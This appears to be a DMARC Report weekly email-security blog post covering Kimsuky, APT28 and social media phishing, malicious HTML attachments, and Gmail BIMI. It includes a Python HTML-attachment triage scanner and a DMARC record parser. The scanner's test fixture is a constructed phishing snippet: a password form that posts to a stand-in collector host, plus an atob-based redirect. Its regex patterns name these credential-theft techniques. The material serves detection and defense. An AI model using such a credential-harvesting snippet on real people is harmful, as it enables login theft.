---
title: "Kimsuky Spear-Phishing Worldwide, 2023 Social Phishing Threat, Phishing HTML Doubles | DMARC Report"
description: "This week"
image: "https://dmarcreport.com/og/blog/kimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles.png"
canonical: "https://dmarcreport.com/blog/kimsuky-spear-phishing-worldwide-2023-social-phishing-threat-phishing-html-doubles/"
---


![Kimsuky Spear-Phishing Worldwide, 2023 Social Phishing Threat, Phishing HTML Doubles](https://media.mailhop.org/dmarcreport/images/2022/04/dmarc-alignment-6379.jpg) 

This week’s [email security](https://dmarcreport.com/blog/why-email-security-matters-and-how-to-get-it-right/) update covers the latest phishing campaigns and new security features. Let’s take a look.

> Domain spoofing is trivially easy without DMARC enforcement, says Brad Slavin, General Manager of DuoCircle. Anyone can send email that looks like it comes from your domain. DMARC with p=reject is the only way to tell receiving servers to block unauthorized senders completely.

According to the [FBI’s 2022 Internet Crime Report (IC3)](https://www.ic3.gov/Media/PDF/AnnualReport/2022IC3Report.pdf), 300,497 US-based victims reported phishing incidents in a single year, and Business Email Compromise (BEC) caused more than $2.7 billion in direct losses.

## North Korean Threat Actor Group Kimsuky Initiates a Worldwide Spear-Phishing Campaign

Kimsuky, a North Korean state-sponsored threat actor group, has launched a new spear-phishing campaign that uses a malware component called ReconShark.

Researchers at SentinelOne published an [advisory](https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/) highlighting that threat actors are deploying ReconShark through targeted spear-phishing campaigns. These ReconShark phishing emails contain OneDrive links that download multiple documents onto the victim’s device, and those documents activate **harmful macros**.

The threat actors abuse the names of real individuals in these emails to lure targets into opening the malicious links. The downloaded files trigger [Microsoft Office macros](https://www.empowerit.com.au/blog/cyber-security/office-macros-disable/) and carry out surveillance, just like Kimsuky’s BabyShark malware. ReconShark is a significant threat: it can exfiltrate information about deployed detection mechanisms and hardware, which allows Kimsuky to carry out subsequent precision attacks.

The [malware](https://www.infosecurity-magazine.com/news/kekw-malware-python-packages/) stores all information in string variables and shares it with a C2 (Command and Control) server, and it can install additional payloads via malicious scripts or DLL (Dynamic Link Library) files.

## Social Media Phishing Emerges as a Significant Cybersecurity Threat in 2023

Threat actors are targeting social media applications for [phishing](https://dmarcreport.com/blog/phishing-smishing-vishing-everything-you-need-to-know/), making social media phishing a significant threat for 2023 and beyond.

The FTC (Federal Trade Commission) shared a [report](https://www.ftc.gov/news-events/news/press-releases/2023/02/new-ftc-data-show-consumers-reported-losing-nearly-88-billion-scams-2022) revealing that individuals lost nearly $8.8 billion to scams in 2022, a 30% increase from 2021. The trend has continued with a significant spike into 2023, so individuals must stay vigilant.

Threat actors employ multiple tactics to target innocent individuals. The previous year saw phishing emails impersonating LinkedIn with fake job offers, malicious direct messages sent to targets, cryptocurrency scam emails promising free [crypto giveaways](https://www.helpnetsecurity.com/2022/09/19/crypto-giveaway-scams-continue-to-escalate/), fraudulent quizzes on Facebook, and customer support scams in which attackers communicate with individuals via online chat rooms to obtain personal information and financial details.


It is recommended to stay away from unsolicited emails and social media conversations. You should refrain from sharing personal information on [social media](https://thehackernews.com/2023/05/meta-uncovers-massive-social-media.html) and double-check all URLs (Uniform Resource Locators) before opening them.

## The Proportion of Malicious HTML Attachments in Phishing Emails Doubles in One Year, Reveals Threat Analysis

Did you know that the volume of emails with malicious HTML (HyperText Markup Language) has doubled from last year?

Barracuda released a new [report](https://blog.barracuda.com/2023/05/03/threat-spotlight-malicious-html-attachments-doubles/) highlighting that the HTML attachments in phishing emails doubled from last year, reaching 46%, a significant spike from the 21% of the previous year.

HTML files are becoming a popular phishing tool for [credential theft](https://www.securitymagazine.com/articles/95302-half-of-us-companies-hit-with-privileged-credential-theft-insider-threats-in-last-year) and other email threats. They redirect individuals via JavaScript libraries to phishing websites or malicious content, and the threat actors use these websites to steal unsuspecting users’ **login credentials**. That is not all: threat actors also use HTML files embedded with sophisticated malware, potent scripts, and executables to do their dirty bidding.

Individuals and organizations need to keep an eye out for these attachments and get the proper security in place to stay protected.
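A first-pass static triage of HTML attachments for the behaviours described above (scripted redirects, remotely loaded scripts, credential forms that post off-site). This is an added example, not code from Barracuda's report or from DMARC Report; the indicator names, the regex heuristics and the sample message are constructed for illustration.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

REMOTE = ("http:", "https:", "//")
# Script idioms used to redirect the browser or unpack hidden markup.
SCRIPT_PATTERNS = {
    "js-redirect": re.compile(r"location(?:\.href)?\s*=(?!=)|location\.(?:replace|assign)\s*\("),
    "js-decode": re.compile(r"\b(?:atob|unescape|eval)\s*\(|document\.write\s*\("),
}

class AttachmentScanner(HTMLParser):  # collects indicator names for one attachment
    def __init__(self):
        super().__init__()
        self.indicators, self.in_script, self.remote_form = set(), False, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip().lower() for k, v in attrs}
        if tag == "script":
            self.in_script = True
            if a.get("src", "").startswith(REMOTE):
                self.indicators.add("remote-script")
        elif tag == "meta" and a.get("http-equiv") == "refresh":
            self.indicators.add("meta-refresh")
        elif tag == "form":  # remember whether this form posts to another host
            self.remote_form = a.get("action", "").startswith(REMOTE)
        elif tag == "input" and a.get("type") == "password" and self.remote_form:
            self.indicators.add("password-form-remote-action")

    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag != "script"
        self.remote_form = self.remote_form and tag != "form"

    def handle_data(self, data):
        if self.in_script:
            self.indicators.update(n for n, rx in SCRIPT_PATTERNS.items() if rx.search(data))

def triage(raw_message: bytes) -> dict:
    """Map each HTML attachment's filename to its sorted indicator list."""
    report = {}
    for part in message_from_bytes(raw_message, policy=policy.default).iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            body = (part.get_payload(decode=True) or b"").decode(
                part.get_content_charset() or "utf-8", "replace")
            scanner = AttachmentScanner()
            scanner.feed(body)
            report[name] = sorted(scanner.indicators)
    return report

# Constructed sample: a credential form posting off-site plus a scripted redirect.
SAMPLE_HTML = """<form action="https://login.example.invalid/collect" method="post">
<input name="user"><input type="password" name="pw"></form>
<script>var t = atob(document.body.dataset.u);
window.location.href = t;</script>"""
_msg = EmailMessage()
_msg.set_content("See attached.")
_msg.add_attachment(SAMPLE_HTML, subtype="html", filename="invoice.html")
SAMPLE_MESSAGE = _msg.as_bytes()
```

An empty indicator list does not clear an attachment; the check is static and only routes suspicious files to sandboxing or manual review.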

## APT28 Focuses on Ukrainian Government Entities Using Deceptive “Windows Update” Emails

The CERT-UA (Computer Emergency Response Team of Ukraine) [issued](https://cert.gov.ua/article/4492467) a warning of cyberattacks by Russian nation-state threat actors targeting Ukrainian **governing bodies**.

The CERT-UA released a blog post outlining that the threat actor group APT28 is behind the new email campaign. Also known as Fancy Bear, Frozen Lake, Iron Twilight, and Forest Blizzard, APT28 sends email messages with the subject line “Windows Update.” These malicious emails contain instructions in the Ukrainian language that run a PowerShell command instead of a security update.

The command executes an additional PowerShell script that collects basic system information and then exfiltrates the details to a Mocky API (Application Programming Interface) using [HTTP requests](https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy). To make the campaign more convincing, these emails impersonate the system administrators of the targeted government agency and use fake MS Outlook email accounts to do so.

Organizations are advised to restrict users' ability to run PowerShell scripts and to monitor all network connections to the Mocky API.


## Gmail Introduces the Blue Checkmark Feature to Strengthen Email Security, Announced by Google

Google [announced](https://workspaceupdates.googleblog.com/2023/05/expanding-gmail-security-BIMI.html?utm%5Fsource=twitter&utm%5Fmedium=unpaidsoc&utm%5Fcampaign=FY23-Q2-Gmail%5FBlog%5FProduct-Education&utm%5Fcontent=-&utm%5Fterm=-&utm%5Fpageloadtype=inline%5Flink) a new blue tick mark feature for its Gmail users. A blue tick will now appear as a small icon next to the logo of the organization sending the email.

The blue tick is part of authentication with [BIMI](https://dmarcreport.com/blog/the-role-of-bimi-in-the-fight-against-email-fraud-and-scam/) (Brand Indicators for Message Identification) and will be available to all Google Workspace, legacy G Suite Basic and Business customers, and personal Google account users. The blue tick is already used on other channels and social media websites such as Instagram and Twitter to set apart verified profiles; in Gmail it comes as an added security feature that will allow individuals to distinguish legitimate emails from malicious ones, boosting email security.

Furthermore, the blue tick will promote strong email authentication as a part of BIMI, urging organizations and businesses to implement [DMARC](https://dmarcreport.com/) (Domain-based Message Authentication, Reporting, and Conformance) and BIMI.

Google’s blue checkmark feature for Gmail was initiated on 3 May 2023 and will roll out completely in the coming days.
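Whether a domain's DMARC policy is actually enforcing, which is the step the BIMI paragraph above urges senders to take, can be read from its published TXT record. The parser below is an added example, not DMARC Report's code; the record strings used with it are constructed, and counting a record as "enforced" only when p is quarantine or reject, pct is 100 and subdomains are covered is this example's own threshold.

```python
POLICIES = ("none", "quarantine", "reject")

def parse_dmarc(txt: str) -> dict:
    """Split a DMARC TXT record into {tag: value}; v=DMARC1 must come first."""
    pairs = []
    for field in txt.split(";"):
        if field.strip():
            name, sep, value = field.partition("=")
            if not sep:
                raise ValueError(f"malformed tag: {field.strip()!r}")
            pairs.append((name.strip().lower(), value.strip()))
    if not pairs or pairs[0] != ("v", "DMARC1"):
        raise ValueError("record must start with v=DMARC1")
    return dict(pairs)

def assess(txt: str) -> dict:
    """Report the effective policy and every gap that weakens enforcement."""
    tags = parse_dmarc(txt)
    p = tags.get("p", "").lower()
    sp = tags.get("sp", p).lower()       # subdomains inherit p when sp is absent
    pct = int(tags.get("pct", "100"))    # the policy covers all mail by default
    if p not in POLICIES or sp not in POLICIES or not 0 <= pct <= 100:
        raise ValueError("invalid p, sp or pct value")
    gaps = []
    if p == "none":
        gaps.append("p=none only monitors; failing mail is still delivered")
    if sp == "none" and p != "none":
        gaps.append("sp=none leaves subdomains open to spoofing")
    if pct < 100:
        gaps.append(f"pct={pct} applies the policy to only part of failing mail")
    return {"p": p, "sp": sp, "pct": pct, "gaps": gaps,
            "enforced": p != "none" and not gaps}

if __name__ == "__main__":
    # Constructed records: one at full enforcement, one weakened, one monitor-only.
    for record in ("v=DMARC1; p=reject; rua=mailto:dmarc@example.com",
                   "v=DMARC1; p=quarantine; sp=none; pct=50",
                   "v=DMARC1; p=none"):
        print(record, "->", assess(record))
```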


[ Vasile Diaconu ](/authors/vasile-diaconu/) 

Operations Lead

Operations Lead at DuoCircle. Runs project management, developer coordination, and technical support execution for DMARC Report.

